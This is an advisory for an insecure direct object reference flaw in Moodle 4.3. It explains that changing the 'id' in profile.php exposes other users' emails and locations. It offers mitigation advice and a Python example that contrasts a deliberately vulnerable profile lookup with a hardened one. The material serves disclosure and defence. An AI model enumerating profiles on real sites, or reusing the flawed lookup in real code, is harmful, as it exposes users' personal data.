Vendor: Moodle
By: tmrswrr
CVSS: 6.1 (HIGH)
Vulnerability Type: Insecure Direct Object Reference (IDOR)
CWE: 285
Product Name: Moodle
Affected Version From: 4.3+
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:moodle:moodle
Platforms Tested: Linux
2023
Moodle 4.3 ‘id’ Insecure Direct Object Reference (IDOR)
The vulnerability in Moodle version 4.3 allows an authenticated user to view other users' details (email address, country, city/town, and timezone) by manipulating the 'id' parameter in URLs such as profile.php?id=11. By changing the 'id' value to another number, the attacker can view the profile information of other users on the platform.
Mitigation:
To mitigate this vulnerability, ensure proper access controls are in place so that users cannot access information they are not authorized to see. Additionally, validate and sanitize the 'id' input, and always check the viewer's permissions before displaying sensitive data.
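The check described above, as an added example in Python rather than Moodle's own PHP: the flawed profile lookup beside a hardened one that validates 'id' and filters the listed fields unless the viewer is allowed to see them. The user records, the enrolments and the "self, admin or shared course" rule are constructed assumptions for the example, not Moodle's actual policy.

```python
from urllib.parse import parse_qs

# Constructed sample data standing in for the user table and course enrolments.
USERS = {
    11: {"name": "Alice", "email": "alice@example.test", "country": "TR",
         "city": "Ankara", "timezone": "Europe/Istanbul"},
    12: {"name": "Bob", "email": "bob@example.test", "country": "DE",
         "city": "Berlin", "timezone": "Europe/Berlin"},
    13: {"name": "Carol", "email": "carol@example.test", "country": "FR",
         "city": "Lyon", "timezone": "Europe/Paris"},
}
ADMINS = {1}                                 # assumed admin account id
COURSE_MEMBERS = {"course-a": {11, 12}}      # assumed enrolments
PUBLIC_FIELDS = ("name",)                    # shown to any logged-in user
# Everything else (email, country, city, timezone) is what the advisory lists as exposed.


def parse_profile_id(query_string):
    """Input validation: 'id' must be present exactly once and be a positive integer."""
    values = parse_qs(query_string).get("id", [])
    if len(values) != 1 or not values[0].isdigit():
        return None
    return int(values[0])


def profile_vulnerable(viewer_id, target_id):
    """The flawed pattern: trusts the 'id' parameter and returns every field to any user."""
    return dict(USERS[target_id])


def can_view_details(viewer_id, target_id):
    """Assumed rule: the user themself, an admin, or someone sharing a course may see details."""
    if viewer_id == target_id or viewer_id in ADMINS:
        return True
    return any(viewer_id in m and target_id in m for m in COURSE_MEMBERS.values())


def profile_hardened(viewer_id, target_id):
    """Checks permission before rendering; unauthorized viewers get public fields only."""
    if target_id not in USERS:
        raise LookupError("no such user")    # render as a plain 404
    record = USERS[target_id]
    if can_view_details(viewer_id, target_id):
        return dict(record)
    return {k: record[k] for k in PUBLIC_FIELDS}
```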